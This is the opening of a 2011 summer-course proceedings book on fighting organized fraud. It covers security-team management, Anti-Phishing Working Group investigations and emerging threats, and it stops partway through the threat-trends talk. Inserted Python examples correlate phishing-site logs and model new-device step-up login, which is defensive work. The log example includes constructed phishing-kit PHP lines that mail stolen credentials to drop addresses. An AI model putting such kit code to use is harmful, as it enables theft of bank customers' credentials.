
The technological fight against organized fraud


2011 Summer Course Book. 109 pages.


The technological fight against organized fraud
2011 Summer Course
Rey Juan Carlos University
Aranjuez, 4–8 July 2011
PUBLISHING PRODUCTION
Design and layout: Miguel Salgueiro / MSGráfica
Printing and binding: Gráficas Monterreina
Legal Deposit: M-22831-2012
2011 Summer Course. The technological fight against organized fraud
Centro de Investigación para la Gestión Tecnológica del Riesgo

INDEX

INTRODUCTION (Santiago Moral Rubio) ................................................ 5
PROLOGUE (Pedro González-Trevijano) ................................................ 7
SECURITY AND BUSINESS: THE HEDGEHOG'S DILEMMA (Alberto Partida) .................... 9
ANTI-PHISHING WORKING GROUP (Gary Warner) .......................................... 15
THREAT HORIZON: IDENTIFYING FUTURE TRENDS (Adrian Davis) ........................... 21
THE RISK OF THE UNPREDICTABLE: "THE BLACK SWANS" (José Antonio Mañas) .............. 27
ROUND TABLE. NEW THREATS ........................................................... 33
    Taking part: David Barroso, Fernando García Vicent, Juan Jesús León Cobos, Elena Maestre García, Alfonso Martín Palma, Rafael Ortega García, Tomás Roy Catalá, Juan Salom Clotet, Marta Villén Sotomayor, Marcos Gómez Hidalgo. Moderator: José de la Peña
THE RISE OF CYBERCRIME: HOW LAGGING SECURITY MEASURES FUEL THE GROWTH IN ORGANIZED FRAUD (Richard Stiennon) ... 45
FROM HACKING TO ARTIFICIAL INTELLIGENCE (Víctor Chapela) ........................... 51
LEGAL CERTAINTY AND CRITICAL ASPECTS OF DATA PROTECTION (Francisco Javier Puyol) ... 57
THE LAW OF PERSONAL DATA PROTECTION IN MEXICO (Ángel Trinidad Zaldívar) ............ 63
DATA PROTECTION AND THE NEW TECHNOLOGICAL CHALLENGES (Artemi Rallo) ................ 69
ROUND TABLE: PRIVACY IN "THE CLOUD" ................................................ 75
    Taking part: Manuel Carpio Cámara, Francisco Javier García Carmona, Guillermo Llorente Ballesteros, Idoia Mateo Murillo, Justo López Parra, Francisco Javier Puyol, Carles Solé Pascual. Moderator: Esperanza Marcos
UNDERSTANDING AND MANAGING SAAS AND CLOUD COMPUTING RISKS (Tom Scholtz) ............ 85
THE DARWINIAN COEVOLUTION (As a strategy in the technological innovation applied to risk management) (Santiago Moral Rubio) ... 91
PHOTO GALLERY ...................................................................... 97
INTRODUCTION
Santiago Moral Rubio (Director of the Summer Course "The technological fight against organized fraud")

Technological globalization has led to a breakthrough in the participation of citizens in the processes of public administrations and of the businesses that provide them with services, but the same risks that exist in the real world have moved to this field. Low-intensity crimes, which harm neither people nor their property, were unprofitable in the physical world and are therefore little prosecuted; technological globalization, however, makes them profitable while they remain low-risk because of international technological anonymity. The risk morphology therefore changes as the parameters of profitability change, and that is what now makes phishing profitable: it is anonymous and massive. Risks change, and the way to manage them changes. The same technologies that have allowed this globalized world to be created must be used to manage the new risks that exist in the virtual world. One of the emerging risks, for example, is the ease with which citizens' personal data can be transmitted and replicated.

In order to talk about all this, the Research Center for Technological Risk Management convened a Summer Course (within the framework of the Summer School of the Rey Juan Carlos University) that was held in Aranjuez (Madrid, Spain) between 4 and 8 July 2011 inclusive, with the active participation of almost 100 attendees and some of the main speakers at the global level in this field. Now, in this publication, we pass on to those interested the transcription of the papers presented at the Summer Course.
PROLOGUE
Pedro González-Trevijano (Rector of the Rey Juan Carlos University)

That two major institutions of economic, financial and academic life, such as BBVA and the Rey Juan Carlos University, should pool their experience and, above all, the qualification and competence of their teams to create training, research and innovation experiences could only herald great and encouraging contributions to the scientific community. Thus was born the Research Center for Technological Risk Management. Under the leadership of Santiago Moral Rubio and Francisco García Marín, the course "The technological fight against organized fraud" was held last July within the summer courses that the Rey Juan Carlos University holds annually at the Royal Site of Aranjuez. The response of the scientific and academic community was massive. The level of the participants was extraordinary. And the result of the work, rigor and seriousness of the 2011 summer experience is today reflected in this magnificent volume.

The need to respond to new forms of risk and fraud, adapted to a global technological reality, is a genuine requirement of an equally universal life experience. The significance of the contribution this work contains lies in the ability of academic institutions and research centers to detect problems, build effective solutions and responses and, straight afterwards, transfer this knowledge to society. The Research Center for Technological Risk Management has become not only a leading reference in this area, but also an example of the intense collaboration that universities and companies can and should undertake in an ever more demanding historical setting. But, above all, it is an exciting and motivating environment; an environment of opportunity and challenges for energy, for reflection born of analysis, and for creativity.

I am convinced that the work of the Research Center for Technological Risk Management will continue to bring, in the immediate future, new grounds for satisfaction like this magnificent work.
SECURITY AND BUSINESS: THE HEDGEHOG'S DILEMMA
Alberto Partida (Security specialist. Author of the book "IT Securiteers. Setting up an IT Security Function")

The philosopher Schopenhauer coined the expression "hedgehog's dilemma" to explain, in his view, how personal and social relationships work. According to him, humans must accept the following paradox: to find the collective warmth necessary for our survival while at the same time avoiding any harm that might arise from that interaction with others. Like the hedgehog that seeks company but must avoid being hurt by the spines of others, or hurting them with its own. This could also explain the perspective from which I took on, five years ago, the challenge of creating a security team that was in tune with the business, and the reason why I decided to write a book. The challenge has been to find a way for business and security to avoid the damage of each other's "quills", seeking in the end something closer to the interaction of penguins, a species that can reach greater intimacy than hedgehogs because they have no spines and no fear of hurting or being hurt. The first change I made in defining my security team was to modify its original name, from "security administration team" to "operational security team", with which we took on the security of the information on production systems; but the challenge remained the same: to achieve harmony between the security team and the business.
To achieve this, the issue must be addressed from two perspectives: one scientific or methodological (analyzing filters, methods and the steps to take in the next stage) and another human (focusing on the need for a multidisciplinary team that works with passion and motivation and fights for innovation).

The methodological element: the method and 5 filters

Understand the organization, adapt to its culture and harvest successes... or at least limit the level of frustration. This is what we want to achieve, and for that we need a method. The method is based on the following formula: Vulnerabilities x Threats – Measures to mitigate = Risks (V x T – M = R). Impact and probability should be taken into account (terms much used for each risk situation), and also the malice of the attacker, though we often overlook it. Finally, there is a ratio between the benefit the attacker obtains and the risk he runs in carrying out the attack, and it is often very unbalanced, as in the case of the attacks by Anonymous, where the attacker assumes a minimal risk compared with the benefit he is seeking. In physical security this ratio is much more even.

At this point we can turn to the five filters, which I prefer to call "1 + 3 + 1", to explain the risk scenarios we must deal with. The first refers, on the one hand, to the fact that the real threats are the detected ones, ignoring those we believe to be real or that pretend to be (hence the importance of monitoring); and, on the other, as a consequence, that the real opponents are likewise the detected ones. The second filter, impact and the ratio between benefit and risk, means working in the organization with risk scenarios that have a high impact but a very low risk for the attacker. The third filter concerns resources and complexity, and the need to be "friendly" to the client: of all the risk scenarios, we must deal first with those requiring the least amount and complexity of resources, and those that do not harm or weaken the daily experience of the user or client; that is, "what can we do with few resources while not damaging the life the client had". The fourth filter refers to building a positive image of the security team within the organization. And, finally, the fifth filter relates to the need to be very realistic, complying both with requests from Management and with regulation.

And how do we comply with these five filters? The answer is simple: with a suitable method, one that makes us go "step by step" and that is simple and limited in time.
Although it is somewhat shocking, in the first years only 40 percent of the resources have to be planned; and when it comes to the technical elements to protect, these must be: networks, systems, applications, data and identities.

The human element: professionals with passion

Having dealt so far with the methodological element, with the need to resort to a method and to overcome the five filters set out above, we now enter the idiosyncrasy of the second element I mentioned for achieving the necessary harmony between the security team and the business, which concerns the human component. Here we return to the metaphors of hedgehogs and penguins to refer to human relations and the need to strengthen ties with others, in this case with other departments, without the spines of either side hurting the counterpart. I believe it is essential to have a highly qualified technical team, either people with a technical profile or people with many years of training to support their knowledge. But we do not stop there: it is crucial to bet on multidisciplinary team capabilities so as not to be isolated in the organization. This, in essence, means establishing ties with other departments and areas, those to whom we communicate our work and our goals, in order to achieve the greater harmony we have been talking about from the beginning. Avoid being separated from the rest, so that nobody can say "there go the security people..." as if we were entities outside the business.

We also need experts in public communications or marketing. They are essential for a security team, in two dimensions: in all their professional practice, which can be applied within the team; and also as conduits of these new perspectives for the group members, to whom they can gradually bring new ideas in the fields of marketing and communication, because we also need to advertise our message and our tasks. And not only that: it is also a priority to count within the team on other profiles, such as statisticians, economists, business people, etc. However, I must admit that I have not seen teams with profiles other than technical ones, though I firmly believe that a varied set will give much better results to the organization.

When creating these multidisciplinary teams, I propose two models to follow, and a common slogan for both: "share, respect and mobilize". For me, sharing information is essential to deepen internal consistency and the success of results. The concept of "mobilize" is also a priority, rather than "motivate", because the latter is a term more focused on the personal sphere and is something that can only be owned on an individual basis; it is not something that can be promoted from the team. That is why I refer instead to "mobilize", and to respect for members of different origins.
In this context, the first model can be summarized in one sentence: bring into the group people who enjoy a degree of balance among all aspects of their life, professionally as well as emotionally and socially. It is about paying attention not only to the professional aspects of the team members, but also to their dimension as human beings. We must take into account the balance between their personal and emotional life, because that will decisively influence their professional side; organizations that do not take this model into account when selecting the members of their department may later discover problems arising from the interaction among their members. There are people who are very good at a professional level but with very few resources in the other two fields, and vice versa; what we need is someone who keeps a certain balance among these three areas of their personality. This is what will lead us to the success of the team; without it, it will not be possible.

The second model, on the other hand, finds its crossroads in the passion with which we perform a specific work: the crossroads between what you like to do and what you are good at doing. Based on that premise, find that "something" the market requires and that can be adjusted to what the professional, and the group of professionals, can offer. It is, in essence, a very simple model, and one that can serve as a guide for deciding in which area or scenario to specialize.

More than one leader and continuous learning

At this point I would like to pass on another key message: we must avoid having a single leader and count, on the contrary, on the collaboration of two or three people who assume that role together. The explanation is simple: the leader's work is quite tense and will always require two or three close partners to achieve his or her goals, among which some are very significant: identifying people who do not have much motivation, and perhaps not so many priorities, to help them find the way that brings them closer to the segment of the group that is really motivated. Thus they will be helped to develop new skills, so that they can even reach what we call the "critical mass of the team": those members with great skills, who are motivated and who set the pace of work for everyone. Precisely for that reason, models like those outlined above should be applied, so that these members remain in the team, and do so as members of quality. In parallel with everything explained so far, and as we also advanced before, we must not forget the significance of sharing knowledge among all members of the team, which is what will make the group strong and consolidated.
We may share both the knowledge obtained through academic training and that accumulated over long years of professional experience. Learning among members will be constant, thanks to communication in all directions and regarding all the tasks to be performed. The group will grow when its members learn from each other; otherwise it is impossible. But to achieve this, and to reach the harmony between the security team and Management we have been talking about from the beginning, it is also essential (and now we speak explicitly about the role of Management) that Management supports the actions of the team, whether with adequate budgets, with technical resources, with more staff, etc. If this does not happen, the degree of frustration of our staff may increase significantly.

Five provocations to the audience

To continue, and as a kind of "alternative ideas bank", I propose to the audience the following "five provocations".

The first has to do with the possibility of considering your CERT as your "guerrilla marketing" team. To illustrate this option, and although they are not from our sector, here are some recent examples I came across: placing a Mercedes Benz vehicle at a European airport so that the public can try it and get acquainted with its performance; or handing out the typical yogurt when people leave the subway early in the morning, inviting us to become consumers. The idea is to apply this to the security incident team. Not that we hand out yogurts, but that we take care of our incident response team so that it becomes our most powerful marketing tool inside the organization. When a security incident occurs, people in the company are disturbed and need to know where to go and, even more, to have a sense of protection, that everything is under control. If you prepare the ground, if you are clear about the elements to be taken into account and if, moreover, you have bet on a marketing component, everything improves. It is similar to what happens in physical security: when a disaster happens, the emergency services arrive at the scene dressed in particularly striking clothing, such as reflective vests. Everyone focuses on them and trusts their instructions.

The second provocation is what I call "the graffiti effect", or the power of images. An example: a few months ago I noticed that in the public toilets of a convention center someone had stolen the toilet disinfectant dispenser; and when I returned a few days ago, it still had not been replaced. The situation remained the same, and that has a devastating visual effect when it comes to trusting, in this case, the cleanliness of those toilets. I call it the "graffiti effect" because it is like thinking of a clean wall and another one full of graffiti... Which of the two invites you to add a new one? On which does it feel that one more will not matter?
The same thing happens with the security team. It is important that its facilities are professional and attractive, in addition to other details that help obtain a better image, both inside and outside the organization: educating employees about passwords, taking care of confidentiality, avoiding confidential papers on desks and things like that.

The third of these five provocations concerns using social connectors, as defined by Malcolm Gladwell in his book "The Tipping Point". In the book the author refers to certain characters, the social connectors, who, though not members of Management, know all the employees of the organization and have a high degree of connection with all the active agents of the company. The proposal is to identify these people within the company and invite them to join our tasks, not as part of the team, but as facilitators and transmitters of the messages we want to bring to the members of the corporation. They will help us make employees, suppliers or customers aware of everything we have decided to implement within the company. For example, we can give them a privacy filter for their laptop, being sure that they will recommend it to their colleagues; or invite them to an attractive seminar where they can take away something tangible related to security, or teach them to create a strong password. The idea is to take advantage of what we have in the smartest way: peer-to-peer communication, taking advantage of the communication and information that flows at the same level, never as an imposition.

The fourth provocation, on the other hand, focuses on what is known as "the power of free". No one can escape the attraction that everything free exerts on us. If we give away encrypted memory devices or screen protectors, their use is surely assured.

Finally, the fifth provocation refers to the axiom that "security may not be destructive", because if this is our attitude towards the organization we run the risk of isolating ourselves. It is more important to be present in the organization's key projects than to complete your own particular one. In short, and as a former professor of mine said, business exists to do business, not to do security, except in the security business; which is why we should never lose sight of the lesson of humility and be aware of the fact that, like everyone else, we too are dispensable.

In this context, and to recap: if we want to successfully develop our work as a security department, and find the harmony we have talked about, we need a few methods, filters, some steps to follow, and a multidisciplinary team with passion, motivation and the desire to innovate.
ANTI-PHISHING WORKING GROUP
Gary Warner (Director of Research in Computer Forensics, The University of Alabama at Birmingham)

I will start my presentation with a reflection: although it seems that people always prioritize the economic factor, and that what criminals are looking for is always money, I really believe there is a much more important factor: reputation. Recently I asked a U.S. Senator whether he had ever received a phishing attack, and he said yes. He told me which bank was impersonated, and I asked his opinion about what should happen to his bank for allowing such attacks against its brand. He replied that most certainly those at the bank were not aware they were under attack, because otherwise they would not allow it. I think that a good reputation is more important than all the gold in the world, and the reputation factor is what we must consider when we allow a phishing attack to continue or not. That, and the impunity that benefits the wrongdoers. We analyzed 85,000 phishing websites against affected banks... And do you know how many of the criminals go to jail? Only 1%, which means that for the remaining 99% it pays to commit these crimes.

There are three areas to which we attach special importance within our working group:

- The training of the professionals who tomorrow will fight cybercrime (which will be even more complex).
- The preparation of the best tools and most effective techniques in this fight, also helping the special units of the law enforcement and security agencies (we work very closely with the specific unit of the FBI for these matters).
- Educating the public about existing cybercrime threats.

In my laboratory we have 35 workstations, organized in three different zones: one for spam and phishing, another for malware and forensic analysis, and then the research part. The latter is where the students really relate to the law enforcement and security agencies, learning what is important and where to focus first when detecting signs of cybercrime. And, based on all the data we handle there, they learn to perform and formalize an investigation in this scenario. We have a spam project in which we have collected more than 500 billion emails, which we have also made available to the law enforcement and security agencies. There we work on how to identify malware in order to know who the criminals that sent these messages are. We have a specific computing facility for cybercrime, with 14 dedicated servers and another ninety-something to store information, and with them we carry out analyses and studies and support the law enforcement forces. We also work with the Drug Enforcement Administration, and even with cybercrime bodies in Germany or the Netherlands.

To carry out our work, we must analyze many processes to determine whether a site is a phishing website. If it is, then automatically we look for a phishing record. We start the manual search and try to figure out the relationship between this phishing site and other phishing websites we have seen in the past. It is important to know the relationships among the various phishing pages because, as we like to say here, not all criminals are equal, and if we understand the relationships among the websites we will also understand what kind of criminal we are facing. For example, we recently discovered a curious case at a bank in Alabama, where a Nigerian man took advantage of copies from the month of February, considered the black history of the bank, to run phishing against the bank. We had everything on him, his Facebook page, and we knew who his friends were. The same happened with phishing against Bank of America, which has more than 800 detected phishing websites against the bank in its department, and there we worked hard to relate all those websites.

Seven steps to a phishing investigation

As I said, we try to find the relationship between the phishing site in question and the others where we have detected an affinity relationship. We enter what we are asked for (user id, password, answers to three security questions, enter the email address again and then a passkey...) and we start to realize that a real website does not work like this.
The operation is simple: when the website gets what it wants, it sends us to the bank's website, and when we wonder who sent us there, we can see the files on the server. Then we can detect how many phishing websites have 100 victims and how many have 1,000, for example, and we can also identify the customers who have visited the phishing website.

What we do, basically, is follow in seven steps the methodology we have created for the investigation of phishing. First we prepare an electronic program that is sent to the client, and then we analyze the file in question. Afterwards we try to determine how this website relates to the other websites we have seen earlier, and then we look at the logs, both on the victim's website and on the phishing website. That is when we are able to identify who has been sabotaging the website to introduce the phishing data. We then find a lot of information on the offender, who is the one entering most data on the phishing website, because he wants to make sure it is working. In fact, the first address we see is nearly always the IP address of the attacker. We may collect all the logs from different websites and see the same IP address across different phishing websites. As I said at the beginning, in the U.S. we work very closely with the law enforcement and security agencies. They usually handle lots of data, but they often do not know how to process it, and then we do it with our tools in our laboratory. By looking at the accounts in Yahoo, Hotmail or Gmail we find out who the victims are. In the last part of the investigation what we do is open source intelligence, analyzing the file.

We can take as an illustrative example a phishing website that operated against BBVA. It was set up on the website of a hotel in Barcelona, which had been compromised to operate as a BBVA phishing site. On this website we discovered the emails of the criminals, which they use to steal the credentials. Following the investigation, we found the same phisher and email address on 8 different websites. In other investigations we found phishing attempts with similar characteristics on 29 different websites. With this we demonstrate that when someone investigates phishing against their own brand, they are often so focused on it that they cannot imagine the same offender is also attacking the competition. On the other hand, we should pay attention to the errors committed by criminals, because they do commit them, and many times these errors are crucial to finding them. We had a case of a phisher who set up more than 100 phishing websites. He thought his secret address was safe, but it was not so safe, and from the group we managed to identify him. We also managed to identify all the phishing sites he had altered and the email accounts he was working with.
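A worked illustration of the log-correlation step described above (the first visitor of a kit as its tester, the count of distinct victims per site, and the same drop address or tester IP recurring across sites). This is example code added here, not the speaker's or the UAB laboratory's tooling; every site name, IP address, e-mail address and log line is constructed, using documentation-reserved ranges and example domains.

```python
"""Correlating phishing sites through shared artifacts (constructed example).

Added illustration of the investigation steps described above; not the
APWG's or UAB's tooling. All log lines, kit snippets, addresses and site
names are constructed for the example.
"""
import re
from collections import defaultdict

# Combined-log-format prefix: client IP, identity, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
EMAIL_RE = re.compile(r'[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}')


def parse_log(lines):
    """Yield (ip, method, path) for each well-formed access-log line, in file order."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.group("ip"), m.group("method"), m.group("path")


def first_visitor_ip(lines):
    """IP of the earliest request; the talk notes this is usually whoever tested the kit."""
    for ip, _, _ in parse_log(lines):
        return ip
    return None


def victim_ips(lines, handler_path):
    """Distinct IPs that submitted the credential form, excluding the first visitor."""
    tester = first_visitor_ip(lines)
    return {ip for ip, method, path in parse_log(lines)
            if method == "POST" and path == handler_path and ip != tester}


def drop_addresses(kit_source):
    """E-mail addresses hard-coded in the kit's mailer script (where stolen data is sent)."""
    return set(EMAIL_RE.findall(kit_source))


def cluster_sites(sites):
    """Group sites that share an artifact (first-visitor IP or drop address).

    sites: {site: {"log": [lines], "kit": "php source", "handler": "/path"}}
    Returns {(artifact_type, value): sorted site names} for artifacts on >1 site.
    """
    seen = defaultdict(set)
    for name, data in sites.items():
        ip = first_visitor_ip(data["log"])
        if ip:
            seen[("first_ip", ip)].add(name)
        for addr in drop_addresses(data["kit"]):
            seen[("drop_email", addr)].add(name)
    return {k: sorted(v) for k, v in seen.items() if len(v) > 1}


# Constructed sample: three compromised hosts, each carrying a phishing kit.
SITES = {
    "hotel-a.example": {
        "handler": "/login.php",
        "log": [
            '203.0.113.7 - - [03/Jul/2011:10:01:02 +0200] "GET /index.html HTTP/1.1" 200 512',
            '203.0.113.7 - - [03/Jul/2011:10:01:30 +0200] "POST /login.php HTTP/1.1" 302 0',
            '198.51.100.21 - - [03/Jul/2011:11:15:09 +0200] "POST /login.php HTTP/1.1" 302 0',
            '198.51.100.44 - - [03/Jul/2011:11:20:41 +0200] "POST /login.php HTTP/1.1" 302 0',
        ],
        "kit": '<?php mail("collector1@example.net", "rezult", $data); header("Location: https://bank.example/"); ?>',
    },
    "shop-b.example": {
        "handler": "/verify.php",
        "log": [
            '203.0.113.7 - - [05/Jul/2011:09:12:00 +0200] "GET /verify.php HTTP/1.1" 200 480',
            '198.51.100.80 - - [05/Jul/2011:12:00:13 +0200] "POST /verify.php HTTP/1.1" 302 0',
        ],
        "kit": '<?php mail("collector1@example.net", "rezult", $data); mail("backup@example.org", "rezult", $data); ?>',
    },
    "blog-c.example": {
        "handler": "/secure.php",
        "log": [
            '192.0.2.250 - - [06/Jul/2011:08:00:00 +0200] "GET /secure.php HTTP/1.1" 200 470',
            '198.51.100.99 - - [06/Jul/2011:08:30:00 +0200] "POST /secure.php HTTP/1.1" 302 0',
        ],
        "kit": '<?php mail("other@example.org", "log", $data); ?>',
    },
}


def site_victim_counts(sites=SITES):
    """Per-site count of distinct submitting IPs other than the tester."""
    return {name: len(victim_ips(d["log"], d["handler"])) for name, d in sites.items()}


if __name__ == "__main__":
    for artifact, names in cluster_sites(SITES).items():
        print(f"{artifact[0]} {artifact[1]!r} links: {', '.join(names)}")
    print(site_victim_counts())
```

On the sample data, hotel-a and shop-b are linked both by the tester IP and by the shared drop address, while blog-c stays unlinked; on real kits the same functions would run over the recovered access logs and mailer scripts.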
Success in research

Fortunately we can say that there have already been quite a few successes which support our work and our dedication in the fight against phishing. With our collaboration, more than 70 people who were carrying out fraudulent activities in different countries of the world were arrested. And in another recent investigation we detected criminals in Romania and Spain, among other countries, dedicated to making phishing websites.

Another investigation that I would like to highlight is one that we carried out in the U.S., which ended with the detection of a person who had been living in Egypt and, on his return to the U.S., began to work as a translator of Arabic. During his stay in Egypt he met many people, and it seems that almost all of them were offenders, and when he returned to our country he deployed a complex network of first- and second-level collaborators in different States, such as California, Nevada, Carolina, etc. These second-level connections withdrew money from ATMs with a false identity and were sending money to Egypt. After a period of research, we managed to have pictures of each and every one of these people. There were 33 people involved within our borders and over 100 worldwide. In the end the plot was stopped and the ringleader got 13 years in jail, for phishing crimes and, by the way, also for growing marijuana.

In 2011 we also investigated the case of three corporations, against whose brands more than 500 phishing websites were operating. It was also one of our most important investigations and we got breakthroughs with it.

In any case, what we always like to say, so everyone is aware, is that offenders are also successful. They can intercept money very easily with the user ID and password.
Having said that, what matters is not so much that the websites are built, since we can find hundreds of such cases. What matters is that these sites end up getting what they were designed for: illicit money.

Malware, more expensive

In addition, I also wanted to comment on the matter of malware, whose cases end up being more expensive than those caused by phishing. According to some studies, for every dollar lost in phishing, three are lost in malware. One of the most advanced is a keylogger called Zeus, which (once the keyboard activity is detected) can take remote control of your computer without much problem.

However, against this type of fraudulent technique, on the investigation side we have others that can counteract its effects. For example, there are options to get the website to detect if you are using a computer other than the usual one and alert you in such cases. It happened to me just yesterday. I wanted to send money to my daughter, and it told me that I was on a computer that wasn’t mine and
asked me for another way to confirm my identity. I entered the other passkey and I could perform the operation. But the important thing is the warning I got saying that I was operating from another computer, putting one more barrier in place when it comes to moving my money.

Device fingerprints

In parallel, we are also faced with a vulnerability in which a technique called “device fingerprinting” appears. And how do we detect fraud in these cases? In the U.S. we have suffered some attacks in this respect, and more than 40 people have been arrested between New York and Ukraine, who had managed to steal more than 200 million dollars. The work dynamics in this case were very simple. A webpage that gave the user problems was accessed, and the user was recommended to use a support telephone number that appeared on the same phishing webpage in order to solve these problems. The offender answered the phone directly and asked for various pieces of information, which he then took the opportunity to use on the phishing page. If we had been able to set up the configuration file, this phone number would never have shown up.

With these configuration files, one of the first steps that should be taken is to confirm whether other banks are in the same configuration file, because they are suffering from the same offender. And perhaps those could afford more advanced intelligence resources and could help us see who “the bad guy” is and how to arrest him.

A vulnerable end user

It is true that a phenomenon such as phishing, which relies on social engineering, can only be prosecuted with technological risk management. Particularly significant here is something that we sometimes forget, and it is that phishing depends on and is based on the existence of a vulnerable end user.
As long as there are humans who make mistakes and don’t pay all the attention that these especially controversial situations deserve, risk will always exist. At the Anti-Phishing Working Group we have worked and will work to prevent this lack of awareness. And we will always try to make the banks aware of the messages they are sending. We must achieve a level of security, through technology and tools and through the awareness of the banks themselves and their users, that allows us to defend ourselves from criminals. So, even if they know our user ID and password, they cannot steal the money so easily.

Conferences and meetings

The Anti-Phishing Working Group was set up to share information, and that’s what we do at our regular meetings. We plan two major Conferences a year, and another General Summit between October and November. In addition, we hold our eCrime Researchers Summit, and the various local Committees, where we invite you to participate from here.
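The new-device check the speaker experienced in the “Malware, more expensive” section (the bank noticing an unfamiliar computer and asking for a second credential before moving money), modelled as an added example; this is not the code of any bank or of the APWG. The attribute set, the user names, the passkeys and the fingerprint key are all constructed for the example.

```python
"""Recognising an unfamiliar device and requiring a second credential (added example)."""
import hashlib
import hmac
import json

# Per-deployment key for hashing fingerprints (constructed placeholder, not a real key).
FINGERPRINT_KEY = b"example-only-fingerprint-key"

# Client attributes assumed reasonably stable for one machine (an assumed set).
STABLE_ATTRS = ("user_agent", "accept_language", "screen", "timezone")


def device_fingerprint(attrs):
    """Keyed SHA-256 over a canonical encoding of the stable attributes.

    Storing the keyed hash instead of the raw attributes means the trust store
    does not leak browser details and cannot be rebuilt without the key.
    """
    canonical = json.dumps({k: str(attrs.get(k, "")) for k in STABLE_ATTRS},
                           sort_keys=True, separators=(",", ":"))
    return hmac.new(FINGERPRINT_KEY, canonical.encode(), hashlib.sha256).hexdigest()


class DeviceTrustStore:
    """Known devices per user; decides whether a login proceeds or needs step-up."""

    def __init__(self):
        self._trusted = {}  # user id -> set of fingerprints

    def decide(self, user, attrs):
        """'allow' for a device already seen for this user, otherwise 'step_up'."""
        fp = device_fingerprint(attrs)
        return "allow" if fp in self._trusted.get(user, set()) else "step_up"

    def enrol(self, user, attrs, second_factor_ok):
        """Trust the device only after the extra credential was verified."""
        if not second_factor_ok:
            return False
        self._trusted.setdefault(user, set()).add(device_fingerprint(attrs))
        return True


def login(store, user, attrs, second_factor=None, verify=None):
    """Post-password step: returns the outcome of the device check.

    `verify` is a callable (user, second_factor) -> bool supplied by the caller;
    the demo below uses a constructed passkey table.
    """
    if store.decide(user, attrs) == "allow":
        return "allowed"
    if second_factor is None:
        return "second_factor_required"  # warn the user and ask for the other passkey
    if verify is not None and verify(user, second_factor):
        store.enrol(user, attrs, True)
        return "allowed_after_step_up"
    return "denied"


def demo():
    """Walk through the flow on constructed users and devices; returns the outcomes."""
    passkeys = {"alice": "482913"}  # constructed second-factor table
    verify = lambda u, code: passkeys.get(u) == code
    store = DeviceTrustStore()
    home = {"user_agent": "Mozilla/5.0 (X11; Linux x86_64)", "accept_language": "es-ES,es",
            "screen": "1920x1080", "timezone": "Europe/Madrid"}
    hotel = dict(home, user_agent="Mozilla/5.0 (Windows NT 6.1)", screen="1366x768")
    return [
        login(store, "alice", home),                     # never seen: ask for second factor
        login(store, "alice", home, "482913", verify),   # correct passkey: enrol and allow
        login(store, "alice", home),                     # now a trusted device
        login(store, "alice", hotel),                    # different machine: step-up again
        login(store, "alice", hotel, "000000", verify),  # wrong passkey: denied, not enrolled
        login(store, "bob", home),                       # same machine, other user: untrusted
    ]


if __name__ == "__main__":
    print(demo())
```

A device check distinguishes machines, not people: malware such as the Zeus keylogger mentioned above operates from the victim’s own, already trusted computer, so this control complements rather than replaces confirmation of the transaction itself.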
THREAT HORIZON: IDENTIFYING FUTURE TRENDS
Adrian Davis (Principal Research Analyst, Information Security Forum - ISF)

Let’s talk about the future as a reality, as something that is concrete and that is already here, and we will be in a better position to understand why we are concerned about it and what threats and risks await us in the Information Society.

But talking about the future is talking about globalization. We live in a globalized world where borders no longer exist, where information technology management, or even malware management, can be outsourced. There is a very interesting book which I recommend, called “The World is Flat: a brief history of the globalized world of the twenty-first century”, by Thomas Friedman, that is very illustrative for this purpose and speaks precisely about this, the absence of borders and a new way of understanding the world.

Things have changed a lot in recent years. Companies have done so by moving freely from some countries to others and expanding their supply chains. And this is still changing constantly, just like supply chains and information security threats and risks. Also, the relationship with suppliers has new features. Now more than ever we must trust the provider, so that they do what you want them to do and, even more important, do what they say they will do, or that they are doing. And that’s the big difference. But the supply chain, in this movement for change, remains a critical component for organizations, its information remains of vital importance… and these changes also make us lose much of the information about it; we know less about how it works and operates.
So we are also facing a very important issue: how can we audit “the cloud”, taking into account that the cloud environment is constantly changing and is not a static system? Everything has changed, and what is our problem? If we have many problems and succumb, the company succumbs and it will be a catastrophe; we will be heavily fined if we don’t comply with the regulations already in force… How do we tell our colleagues and partners that the important thing is still the information? We have to be careful that what happened to the boy who cried wolf so many times does not happen to us: the day the wolf really appeared, nobody believed him.

Everything is information

We see how the way we work changes and how we are entering another dimension, which has its own threats and its own problems. We have to be prepared, and must pay close attention to what might happen, regardless of whether it occurs or not. Progress is measured according to its utility and its popularization. In 1876 the telephone was not helpful because there were very few and the communication capacity was very scarce, but now we cannot live without it. The same goes for social networks, which extend their tentacles more and more and establish more and more relations among us. In any environment, information is related to information technologies, and these are becoming the center of our lives.

The work of ISF

And at ISF, what do we do to help understand this changing environment? Very simple: we collect information, talk to quite a lot of people of very different profiles and thus approach legal, economic, cultural, political and technological factors, etc., and manage to have a more complete view of the world that lies ahead of us.
Thus, we may know what the most important threats to information security will be and how they will relate to the changes that we will undergo in society in the near future. And we share all this information with the sector through the reports we publish and the meetings that we hold. I personally have been lucky enough to have managed this project for the last four reports.

We hold several meetings a year and there we ask what the new technological trends will be. In Spain we will hold a call for the Regional ISF Chapter in March in Madrid; and there, among other topics, we will talk about security in industrial environments, the protection of critical infrastructures and the work program of ISF for this year. As I said, in these meetings we speak with people who work in manufacturing, banking, health care, and also talk with the World Economic Forum and futurists (I highlight here a book entitled “The next 50 years”, which is very interesting); and then we put everything in common in our annual Congress, to be held from 4 to 6 November in Chicago. And it is from there that we gather
together the final information and the correct data to begin drafting the report.

What we are seeing is that in the United Kingdom, also in the U.S. and, above all, in the European Union, an effort is being made to integrate, more and more, information and privacy regulations. In the European Union, on May 1st, 2011, the so-called “cookies law” came into effect, which says that the information of people who visit the web cannot be stored in cookies unless expressly allowed. In the United Kingdom, for example, if personal information is lost, our Data Privacy Office can impose a fine of half a million pounds each time this privacy is violated.

Most important threats for 2011

We know of many anonymous attacks, and many are simply caused by errors which could easily be remedied; for example, because we do not have the patches installed or because we don’t update the servers correctly. And this is what we know; beyond that we have the unknown, and what criminals can do. And an environment that most certainly is not safe from the attacks of cybercriminals is “the cloud”. More and more businesses migrate some of their platforms, or even critical systems, to “the cloud”.

